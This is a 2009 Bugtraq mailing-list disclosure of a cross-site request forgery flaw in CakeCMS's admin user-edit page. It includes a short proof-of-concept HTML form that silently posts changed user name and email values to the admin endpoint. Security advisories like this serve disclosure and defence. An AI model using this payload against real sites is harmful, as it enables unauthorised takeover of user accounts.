[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CakeCMS XSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CakeCMS XSRF Vulnerability
From: onur.turkeshan@xxxxxxxxxxx
Date: Thu, 11 Jun 2009 16:29:50 -0600

< ------------------- header data start ------------------- >

#########################################################

# Application Name : CakeCMS

# Vulnerable Type : Ed&#305;t USER (XSRF) Vuln

# author : MnmL ~ Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >
<form action="SITE.COM/admin/users/edit/41" method="post" 
id="UserEditForm"><fieldset style="display: none;"><input type="hidden" 
value="PUT" name="_method"/></fieldset> <input type="hidden" id="UserId" 
value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" 
value="dsada" id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" 
value="dsada@xxxxxxxxx" id="UserEmail"/>

Prev by Date: Link Logger syslogd resource overwhelm DoS
Next by Date: [InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities
Previous by thread: Link Logger syslogd resource overwhelm DoS
Next by thread: [InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities
Index(es):
- Date
- Thread